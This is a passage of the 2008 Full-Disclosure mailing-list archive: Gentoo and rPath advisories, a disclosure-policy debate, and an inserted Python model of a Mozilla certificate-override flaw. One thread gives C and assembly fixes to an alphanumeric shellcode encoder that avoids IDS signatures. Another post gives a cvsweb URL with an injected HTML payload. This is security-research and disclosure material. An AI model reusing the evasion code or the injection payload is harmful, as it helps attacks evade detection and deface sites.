Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 mozilla-firefox < 2.0.0.16 >= 2.0.0.16 2 mozilla-firefox-bin < 2.0.0.16 >= 2.0.0.16 3 mozilla-thunderbird < 2.0.0.16 >= 2.0.0.16 4 mozilla-thunderbird-bin < 2.0.0.16 >= 2.0.0.16 5 seamonkey < 1.1.11 >= 1.1.11 6 seamonkey-bin < 1.1.11 >= 1.1.11 7 xulrunner < 1.8.1.16 >= 1.8.1.16 8 xulrunner-bin < 1.8.1.16 >= 1.8.1.16 ------------------------------------------------------------------- 8 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== The following vulnerabilities were reported in all mentioned Mozilla products: * TippingPoint's Zero Day Initiative reported that an incorrect integer data type is used as a CSS object reference counter, leading to a counter overflow and a free() of in-use memory (CVE-2008-2785). * Igor Bukanov, Jesse Ruderman and Gary Kwong reported crashes in the JavaScript engine, possibly triggering memory corruption (CVE-2008-2799). * Devon Hubbard, Jesse Ruderman, and Martijn Wargers reported crashes in the layout engine, possibly triggering memory corruption (CVE-2008-2798). * moz_bug_r_a4 reported that XUL documents that include a script from a chrome: URI that points to a fastload file would be executed with the privileges specified in the file (CVE-2008-2802). * moz_bug_r_a4 reported that the mozIJSSubScriptLoader.LoadScript() function only applies XPCNativeWrappers to scripts loaded from standard "chrome:" URIs, which could be the case in third-party add-ons (CVE-2008-2803). * Astabis reported a crash in the block reflow implementation related to large images (CVE-2008-2811). * John G.
Myers, Frank Benkstein and Nils Toedtmann reported a weakness in the trust model used by Mozilla, that when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, the certificate is also regarded as accepted for all domain names in subjectAltName:dNSName fields (CVE-2008-2809). The following vulnerabilities were reported in Firefox, SeaMonkey and XULRunner: * moz_bug_r_a4 reported that the Same Origin Policy is not properly enforced on JavaScript (CVE-2008-2800). * Collin Jackson and Adam Barth reported that JAR signing is not properly implemented, allowing injection of JavaScript into documents within a JAR archive (CVE-2008-2801). * Opera Software reported an error allowing for arbitrary local file upload (CVE-2008-2805). * Daniel Glazman reported that an invalid .properties file for an add-on might lead to the usage of uninitialized memory (CVE-2008-2807). * Masahiro Yamada reported that HTML in "file://" URLs in directory listings is not properly escaped (CVE-2008-2808). * Geoff reported that the context of Windows Internet shortcut files is not correctly identified (CVE-2008-2810). * The crash vulnerability (CVE-2008-1380) that was previously announced in GLSA 200805-18 is now also also resolved in Seamonkey binary ebuilds. The following vulnerability was reported in Firefox only: * Billy Rios reported that the Pipe character in a command-line URI is identified as a request to open multiple tabs, allowing to open "chrome" and "file" URIs (CVE-2008-2933). Impact ====== A remote attacker could entice a user to view a specially crafted web page or email that will trigger one of the vulnerabilities, possibly leading to the execution of arbitrary code or a Denial of Service. It is also possible for an attacker to trick a user to upload arbitrary files or to accept an invalid certificate for a spoofed web site, to read uninitialized memory, to violate Same Origin Policy, or to conduct Cross-Site Scripting attacks. 
Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mozilla Firefox users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot -v ">=www-client/mozilla-firefox-2.0.0.16"

All Mozilla Firefox binary users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask -1 -v ">=www-client/mozilla-firefox-bin-2.0.0.16"

All Mozilla Thunderbird users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask -1 -v ">=mail-client/mozilla-thunderbird-2.0.0.16"

All Mozilla Thunderbird binary users should upgrade to the latest version:

    # emerge --sync
    # emerge -a -1 -v ">=mail-client/mozilla-thunderbird-bin-2.0.0.16"

All SeaMonkey users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.1.11"

All SeaMonkey binary users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot -v ">=www-client/seamonkey-bin-1.1.11"

All XULRunner users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-libs/xulrunner-1.8.1.16"

All XULRunner binary users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot -v ">=net-libs/xulrunner-bin-1.8.1.16"

References
==========

  [ 1 ] CVE-2008-1380
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1380
  [ 2 ] CVE-2008-2785
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2785
  [ 3 ] CVE-2008-2798
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2798
  [ 4 ] CVE-2008-2799
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2799
  [ 5 ] CVE-2008-2800
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2800
  [ 6 ] CVE-2008-2801
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2801
  [ 7 ] CVE-2008-2802
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2802
  [ 8 ] CVE-2008-2803
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2803
  [ 9 ] CVE-2008-2805
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2805
  [ 10 ] CVE-2008-2807
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2807
  [ 11 ] CVE-2008-2808
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2808
  [ 12 ] CVE-2008-2809
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2809
  [ 13 ] CVE-2008-2810
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2810
  [ 14 ] CVE-2008-2811
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2811
  [ 15 ] CVE-2008-2933
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2933
  [ 16 ] GLSA 200805-18
        http://www.gentoo.org/security/en/glsa/glsa-200805-18.xml

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
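The CN/subjectAltName weakness in the Mozilla advisory above (CVE-2008-2809) comes down to what a stored certificate exception is keyed on: if the browser remembers "this certificate is accepted", the acceptance silently covers every dNSName the certificate lists, not just the host the user was looking at when they clicked through the warning. The following is an added example written for this page, not Mozilla code and not part of the advisory. It is a small Python model of a client's override store, with the per-certificate behaviour the advisory describes beside a per-host variant, and a hostname matcher to decide which names a certificate covers. The hostname-matching rules, the override API, the host names and the certificate contents (including the DER stand-in) are assumptions made for the demonstration.

```python
"""Scope of a user-accepted certificate exception: per certificate vs per host.

Added example for this page; not Mozilla code and not part of the advisory.
Models the CVE-2008-2809 trust decision as the advisory describes it.
Host names, certificate fields and the DER stand-in are constructed.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class Cert:
    subject_cn: str
    san_dns: tuple = ()   # subjectAltName dNSName entries, possibly empty
    der: bytes = b""      # constructed stand-in for the DER encoding

    @property
    def fingerprint(self) -> str:
        return hashlib.sha256(self.der).hexdigest()

    def names(self) -> tuple:
        """Names the certificate claims: the SAN dNSNames if any, else the CN."""
        return self.san_dns if self.san_dns else (self.subject_cn,)


def hostname_matches(pattern: str, host: str) -> bool:
    """Case-insensitive match; a wildcard is allowed only as the whole
    leftmost label, matches exactly one label, and needs two more labels."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == host
    p_labels, h_labels = pattern.split("."), host.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def cert_covers_host(cert: Cert, host: str) -> bool:
    return any(hostname_matches(n, host) for n in cert.names())


class PerCertOverrides:
    """Flawed scheme: the stored exception is the certificate alone, so it
    is honoured for every name the certificate lists."""

    def __init__(self):
        self._accepted = set()

    def accept(self, host: str, cert: Cert) -> None:
        self._accepted.add(cert.fingerprint)

    def is_trusted(self, host: str, cert: Cert) -> bool:
        return cert.fingerprint in self._accepted and cert_covers_host(cert, host)


class PerHostOverrides:
    """Corrected scheme (this example's own design): the exception is keyed
    on the host the user was visiting, so the same certificate presented
    for another of its names is still rejected."""

    def __init__(self):
        self._accepted = {}

    def accept(self, host: str, cert: Cert) -> None:
        self._accepted[host.lower()] = cert.fingerprint

    def is_trusted(self, host: str, cert: Cert) -> bool:
        return self._accepted.get(host.lower()) == cert.fingerprint


def connection_allowed(host: str, cert: Cert, chain_ok: bool, overrides) -> str:
    """'ok' when the chain validates and a name matches, 'override' when only
    a stored user exception allows the connection, otherwise 'reject'."""
    if chain_ok and cert_covers_host(cert, host):
        return "ok"
    if overrides.is_trusted(host, cert):
        return "override"
    return "reject"


def run_scenario(store_cls) -> dict:
    """Self-signed attacker certificate naming both the attacker's host and
    a bank host. The victim accepts it on the attacker's site; later the same
    certificate is presented for the bank, e.g. by a DNS or MITM attack."""
    evil = Cert("attacker.example", ("attacker.example", "www.bank.example"),
                der=b"constructed DER bytes of the attacker certificate")
    store = store_cls()
    before = connection_allowed("www.bank.example", evil, False, store)
    store.accept("attacker.example", evil)  # user clicks through the warning
    return {
        "before": before,
        "attacker": connection_allowed("attacker.example", evil, False, store),
        "bank": connection_allowed("www.bank.example", evil, False, store),
    }


if __name__ == "__main__":
    for cls in (PerCertOverrides, PerHostOverrides):
        print(f"{cls.__name__}: {run_scenario(cls)}")
```

Run it directly to see both outcomes: with the per-certificate store, the attacker's self-signed certificate, accepted once on attacker.example, also passes for www.bank.example; with the per-host store it is rejected there. Keying exceptions on the host the user actually visited (and, in a real client, the port as well) is the check to look for in any client that lets users click through certificate errors.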
From rbu at gentoo.org Wed Aug 6 01:46:00 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Wed, 6 Aug 2008 02:46:00 +0200
Subject: [Full-disclosure] [ GLSA 200808-04 ] Wireshark: Denial of Service
Message-ID: <200808060246.03789.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200808-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Wireshark: Denial of Service
      Date: August 06, 2008
      Bugs: #230411, #231587
        ID: 200808-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple Denial of Service vulnerabilities have been discovered in Wireshark.

Background
==========

Wireshark is a network protocol analyzer with a graphical front-end.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /  Vulnerable  /       Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/wireshark        < 1.0.2               >= 1.0.2

Description
===========

Multiple vulnerabilities related to memory management were discovered in the GSM SMS dissector (CVE-2008-3137), the PANA and KISMET dissectors (CVE-2008-3138), the RTMPT dissector (CVE-2008-3139), the syslog dissector (CVE-2008-3140), the RMI dissector (CVE-2008-3141) and the reassembly of fragmented packets (CVE-2008-3145).

Impact
======

A remote attacker could exploit these vulnerabilities by sending a specially crafted packet on a network being monitored by Wireshark or by enticing a user to read a malformed packet trace file, causing a Denial of Service.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All Wireshark users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.0.2"

References
==========

  [ 1 ] CVE-2008-3137
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3137
  [ 2 ] CVE-2008-3138
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3138
  [ 3 ] CVE-2008-3139
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3139
  [ 4 ] CVE-2008-3140
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3140
  [ 5 ] CVE-2008-3141
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3141
  [ 6 ] CVE-2008-3145
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3145

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
From research at sec-consult.com Wed Aug 6 02:28:39 2008
From: research at sec-consult.com (Bernhard Mueller)
Date: Wed, 6 Aug 2008 03:28:39 +0200
Subject: [Full-disclosure] (no subject)
In-Reply-To: <6158bb410808051726rc92d72bi89f4f82ea35eeb4e@mail.gmail.com>
References: <1217974979.8503.16.camel@b4byl0n> <6158bb410808051726rc92d72bi89f4f82ea35eeb4e@mail.gmail.com>
Message-ID: <1217986119.4062.2.camel@b4byl0n>

On Wed, 2008-08-06 at 02:26 +0200, Ureleet wrote:
> does that research involve you using a subject line in ur emails?

No, I left it out intentionally to provoke one of your useless posts.

"When n3td3v does a pushup, he isn't lifting himself up, he's pushing the Earth down!"

--
_________________________________________
Bernhard Mueller
Security Consultant
SEC Consult Unternehmensberatung GmbH
www.sec-consult.com
A-1190 Vienna, Mooslackengasse 17
phone +43 1 8903043 34
fax +43 1 8903043 15
mobile +43 676 840301 718
email b.mueller at sec-consult.com
Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223
Firmensitz: Prof. Dr. Stephan Korenstraße 10, A-2700 Wiener Neustadt
Advisor for your information security.

From avri.schneider at gmail.com Wed Aug 6 07:06:34 2008
From: avri.schneider at gmail.com (Avraham Schneider)
Date: Wed, 6 Aug 2008 09:06:34 +0300
Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection
In-Reply-To:
References: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org>
Message-ID:

While my post awaits moderator approval (over 100KB), I thought I'd share with you a fix.

Basically what I do now is this: ebx needs to point to the address of the decoder+1, and edx and ecx need to point to the address of the decoder. Since we added 2 bytes to the head of the decoder, I need to increment ebx, ecx, and edx by 2 to preserve the same functionality.
I do this by utilizing one of the unused push instructions to the stack (for an unused register) and replacing it with an inc ecx just before ecx is pushed to the stack for setting the ebx register on a popad; ecx at that point holds the address of the decoder + 2.

So now I don't need to increment ebx before the start of the decoder loop, and I can use that instruction to increment edx or ecx. And since I don't need the inc edi either, I can also use it to inc ecx or edx.

I can also push ecx (containing the address of the decoder) to the stack before the push for setting the ecx register on the popad. Since ecx was not a needed register before (I set it within the decoder head from edx), I randomized the corresponding push register instruction; not anymore. Now I push ecx, and it holds the address of the decoder, which would be incremented by 2 as described above.

So to summarize: I have 4 instructions in the decoder head I can play with (as I don't need push ecx; pop eax; inc ebx; inc edi), and I use them to increment ecx and edx by 2. I replace one of the push instructions for the popad (this affects eax, which will now contain the first 4 bytes of the decoder head, which we don't care about) with an inc ecx; this is used to increment ebx once (by incrementing ecx before the push for setting the ebx register).

Here's the code. Add this to the if(p_state[3]){} block, after all the previous checks (i.e. at the end of the block). Make sure to change the p_state[] allocation to support the extra states, i.e. change to UCHAR *p_state[9]; and memset(p_state, 0, sizeof(UCHAR*)*9);

    /* Q() stringifies the macro, so compare with strcmp(): "==" on two
       string literals compares pointers, not contents. */
    if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp"))
    {   //.*[8A].*[8A].*[56].*[56]
        p_state[5] = memchr(p_state[0], 5,  11-(p_state[0]-random_states));
        p_state[6] = memchr(p_state[0], 6,  11-(p_state[0]-random_states));
        p_state[7] = memchr(p_state[0], 8,  11-(p_state[0]-random_states));
        p_state[8] = memchr(p_state[0], 10, 11-(p_state[0]-random_states));
        /* the two inc ecx / inc edx states must come after the pushes */
        if (p_state[5] < p_state[7] || p_state[5] < p_state[8] ||
            p_state[6] < p_state[7] || p_state[6] < p_state[8])
            p_state[4] = 0;
    }

Change to the following:

    /* esp as base register: 'A' inc ecx, 'B' inc edx; otherwise the original
       'R' push edx, 'Y' pop ecx, 'G' inc edi, 'C' inc ebx */
    instructions[7][0]  = !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? '\x41' : '\x52'; //R
    instructions[8][0]  = !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? '\x42' : '\x59'; //Y
    instructions[9][0]  = !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? '\x41' : '\x47'; //G
    instructions[10][0] = !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? '\x42' : '\x43'; //C
    strcat(instruction_comments[7],  !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? "inc ecx" : "push edx");
    strcat(instruction_comments[8],  !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? "inc edx" : "pop ecx");
    strcat(instruction_comments[9],  !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? "inc ecx" : "inc edi");
    strcat(instruction_comments[10], !strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp") ? "inc edx" : "inc ebx");

Place the following before printing the decoder to stdout (instead of the previous fix):

    //bugfix: handle case of esp pointing to shellcode
    if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp"))
    {
        /*
        _asm
        {
            push esp
            pop ecx
            push ecx
            push ecx
            inc ecx      // since the stack is messed up here, eax results in
            push ecx     // being equal to the first 4 bytes of the decoder
        }
        and we also 'fix' the decoder head accordingly
        */
        p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+2);
        memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+2);
        memcpy(p_alnum_shellcode+2, alnum_shellcode, strlen(alnum_shellcode)+1);
        p_alnum_shellcode[0] = 'T';                                  // push esp
        p_alnum_shellcode[1] = 'Y';                                  // pop ecx
        p_alnum_shellcode[2] = 'Q';                                  // push ecx
        p_alnum_shellcode[3] = get_push_register_instruction("ecx"); // push ecx
        p_alnum_shellcode[4] = 'A';                                  // inc ecx
        p_alnum_shellcode[5] = get_push_register_instruction("ecx"); // push ecx
    }

On Wed, Aug 6, 2008 at 2:36 AM, Avraham Schneider wrote:
> On Tue, Aug 5, 2008 at 11:31 PM, Avraham Schneider wrote:
>> Oops - that is not correct - it will only work when the second and third bits of ESP are 0
>>
>> :-) I was too quick on the send button.
>>
>> EAX is basically XOR'd with the length of the string, and instead I need to increment it by the length of the string... I'll have to come up with a better solution... (I'll probably have to resort to patching... but I was looking for a quick and dirty fix)
>>
>> If anyone comes up with a solution for this before me, I'll buy them a Shawarma next time they're in Israel ;-)
>>
>> Regards,
>> Avri
>>
>> On Tue, Aug 5, 2008 at 7:00 PM, Avraham Moshe Schneider wrote:
>>> I fixed a couple of bugs -
>>>
>>> 1. The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on
>>> 2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640"
>>> This translates to:
>>> _asm
>>> {
>>>     push esp;
>>>     pop eax;
>>>     xor al, 0x36;
>>>     xor al, 0x30;
>>> }
>>>
>>> The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa.
>>>
>>> You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly.
>>> The diff between the two XOR values should be the length of the resulting string.
>>>
>>> I used the EAX register, as XOR'ing it with an immediate value is alphanumeric.
>>>
>>> Regards,
>>> Avri
>>> **********************************************************************************************
>>>
>>> The contents of this email and any attachments are confidential.
>>> It is intended for the named recipient(s) only.
>>> If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies.
>>> ** eSafe scanned this email for viruses, vandals and malicious content **
>>>
>>> **********************************************************************************************
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>

From david.jonass at googlemail.com Tue Aug 5 14:29:47 2008
From: david.jonass at googlemail.com (r0tten c0re)
Date: Tue, 5 Aug 2008 15:29:47 +0200
Subject: [Full-disclosure] McAfee + FUD ?
Message-ID: <286399310808050629k128b7e97pe30d838f798336aa@mail.gmail.com>

Hi all,

Seems like McAfee chose to counter FUD with more FUD, which triggered this:

http://www.nruns.com/_downloads/PR-08-02_Reaction_to_McAfee_statement.pdf

I have been aware of the ongoing AV insecurity catastrophe but had not read about this McAfee<->n.runs discussion. Anyways, a good read.

"n.runs welcomes the AV-Industry SDL (Secure Development Lifecycle) effort spearheaded by McAfee. While we greatly support the introduction of an SDL, it will not entirely extinguish flaws with security relevance. Although it has the potential of greatly reducing their number and impact, it will not lead to invulnerable software. In order to reach this goal, we consider it necessary to reduce the amount of trusted code to an absolute minimum, reduce the attack surface to an absolute minimum and place all untrusted code into a strictly confined environment.
This way no matter how badly the code behaves, and no matter how many vulnerabilities it has, it cannot violate the security requirements."

Regards,
David

From manuchauuu at googlemail.com Wed Aug 6 11:25:33 2008
From: manuchauuu at googlemail.com (Manu Chao)
Date: Wed, 6 Aug 2008 07:25:33 -0300
Subject: [Full-disclosure] Check this out
Message-ID: <6142b9ef0808060325q178f76baka9974a50a9207938@mail.gmail.com>

http://www.openbsd.org/cgi-bin/cvsweb/src/?sortby=%22%3E%3Ch1%20style=%22position:absolute;top:10px;font-size:72pt%22%3E%3Cblink%3EOnly%202%20Remote%20bugs%3C/blink%3E%3C/h1%3E

Chauuuuu!

From avri.schneider at gmail.com Wed Aug 6 00:36:38 2008
From: avri.schneider at gmail.com (Avraham Schneider)
Date: Wed, 6 Aug 2008 02:36:38 +0300
Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection
In-Reply-To:
References: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org>
Message-ID:

On Tue, Aug 5, 2008 at 11:31 PM, Avraham Schneider wrote:
> Oops - that is not correct - it will only work when the second and third bits of ESP are 0
>
> :-) I was too quick on the send button.
>
> EAX is basically XOR'd with the length of the string, and instead I need to increment it by the length of the string... I'll have to come up with a better solution... (I'll probably have to resort to patching... but I was looking for a quick and dirty fix)
>
> If anyone comes up with a solution for this before me, I'll buy them a Shawarma next time they're in Israel ;-)
>
> Regards,
> Avri
>
> On Tue, Aug 5, 2008 at 7:00 PM, Avraham Moshe Schneider wrote:
>> I fixed a couple of bugs -
>>
>> 1. The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on
>> 2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640"
>> This translates to:
>> _asm
>> {
>>     push esp;
>>     pop eax;
>>     xor al, 0x36;
>>     xor al, 0x30;
>> }
>>
>> The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa.
>>
>> You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly.
>> The diff between the two XOR values should be the length of the resulting string.
>>
>> I used the EAX register, as XOR'ing it with an immediate value is alphanumeric.
>>
>> Regards,
>> Avri
>>
>

-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: alnum_decoder_encoder.c
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/fa59e31d/attachment.c

From announce-noreply at rpath.com Wed Aug 6 01:48:11 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Tue, 05 Aug 2008 20:48:11 -0400
Subject: [Full-disclosure] rPSA-2008-0245-1 cups
Message-ID: <4898f4cb.6FIryIYnQ6b3AKET%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0245-1
Published: 2008-08-05
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Remote Root Deterministic Unauthorized Access
Updated Versions:
cups=conary.rpath.com at rpl:1/1.1.23-14.8-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-2390

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1374

Description:
Previous versions of the cups package are vulnerable to an Arbitrary Code Execution attack in which an attacker may use a maliciously crafted PDF file to trigger an integer overflow on 64-bit platforms.

http://wiki.rpath.com/Advisories:rPSA-2008-0245

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From announce-noreply at rpath.com Wed Aug 6 01:52:00 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Tue, 05 Aug 2008 20:52:00 -0400
Subject: [Full-disclosure] rPSA-2008-0246-1 gaim
Message-ID: <4898f5b0.nU4M7mcTNCCGe9SQ%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0246-1
Published: 2008-08-05
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
gaim=conary.rpath.com at rpl:1/1.5.0-4.3-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-2647

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2956

Description:
Previous versions of the gaim package are vulnerable to multiple attacks, the most serious of which may allow a remote attacker to exploit the MSN protocol handler and thus execute arbitrary code as the user running gaim.

http://wiki.rpath.com/Advisories:rPSA-2008-0246

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From trejrco at gmail.com Wed Aug 6 12:56:50 2008
From: trejrco at gmail.com (TJ)
Date: Wed, 6 Aug 2008 07:56:50 -0400
Subject: [Full-disclosure] Kaminsky's Law
In-Reply-To: <6158bb410808051725o6edd6ce2x3414eb0ee45b8485@mail.gmail.com>
References: <4b6ee9310807250356y5282dbbfr750a8a27c5a94079@mail.gmail.com> <002401c8ee4e$087f4f40$1214dd80@corp.emc.com> <6158bb410808051725o6edd6ce2x3414eb0ee45b8485@mail.gmail.com>
Message-ID: <000601c8f7bb$83a5b800$8af12800$@com>

Again, irony abounds ... pushing for a "Responsible Disclosure Act" on a forum named "Full Disclosure" ... makes me smile.
(Not saying either side is right/wrong, just throwing that out there)

Nits:

* Said laws would only apply within a given jurisdiction ...
so disclosures would simply come, or appear to come, from outside said jurisdiction.

* Who gets to decide how many machines were compromised? Some sources never divulge, some drastically over-inflate.

* Who defines what "responsible" is? Some argue that telling the vendor as hitting send/post counts, some say 1 week, etc. In some cases, maybe a month isn't enough for patch deployment ... is that still "responsible"?

* I think the "big guys" you reference could come up with answers, but prefer things the way they are now. .... just supposition on my part there ...

... and given the govt's previous track record on "cyber" issues, let's pause and reflect on whether we want them trying again.

/TJ

>> ----- Original Message -----
>> From: "n3td3v"
>> To:
>> Sent: Friday, July 25, 2008 6:56 AM
>> Subject: [Full-disclosure] Kaminsky's Law
>>
>>
>>> So what you're saying is HD Moore and |)ruid are exploiting a loophole in the law to do what they do... looks like we need to get the law tightened.
>>>
>>> I say a "Responsible Disclosure Act" is drawn up, and anyone who breaks it goes to jail.
>>>
>>> That will mean:
>>>
>>> - People will think twice before hitting send on blog entries,
>>>
>>> - People will think twice about releasing code early,
>>>
>>> - That the decided timeline for disclosure can be enforced,
>>>
>>> - That the people who release information and/or code early get fined for every computer system compromised because of the vulnerability information and/or code disclosure, on top of the jail sentence.
>>>
>>> So instead for the future it's not just a verbal contract for responsible disclosure, it's a legally binding contract as well, meaning if the Responsible Disclosure Act has been signed by the security researcher and its affected vendors, then ass hats like HD Moore and |)ruid are breaking the law.
>>>
>>> The details are a bit fuzzy right now, but I'm sure the big guys in the industry can draw up proper rules for a Responsible Disclosure Act.
>>>
>>> It's likely the Responsible Disclosure Act would only be used in exceptional circumstances like this DNS caching vulnerability, and the approval of the act per vulnerability case has to be decided on by a judge in a court of law, so that the Responsible Disclosure Act can't be overused and abused, to keep the use of the act fair and proportional in relation to the level of the threat.
>>>
>>> That means Full-Disclosure of vulnerability information and/or wouldn't be illegal all the time, just in exceptional circumstances that have to be OK'd by a judge.
>>>
>>> This safeguards the deployment of a patch or patches while telling the public what the importance of patching is, while disallowing security researchers from releasing information and/or code before the timeline for responsible disclosure.
>>>
>>> So the scenario would be,
>>>
>>> jake: hey did you hear about the patches being deployed and the news reports about the flaw and why the patch is critical?
>>>
>>> joe: yes, but the responsible disclosure act has been signed so we need to wait until it expires before we can share info.
>>>
>>> jake: no way, what's the assigned disclosure date?
>>>
>>> joe: the standard 4 weeks, although with the responsible disclosure act, after the 4 weeks, the security researcher and vendors can go back to the judge to ask for an extra 4 week extension onto that, so it could be eight weeks bro before we can become famous for five minutes by releasing attack code.
>>>
>>> jake: ah, sucks for us, but yeah if the judge has approved the signing there isn't a lot we can do unless we want to be labeled criminals, and hunted down by Interpol.
>>>
>>> What has to be told to the community under the act:
>>>
>>> - The community must be told the Responsible Disclosure Act has been signed and OK'd by a judge.
>>>
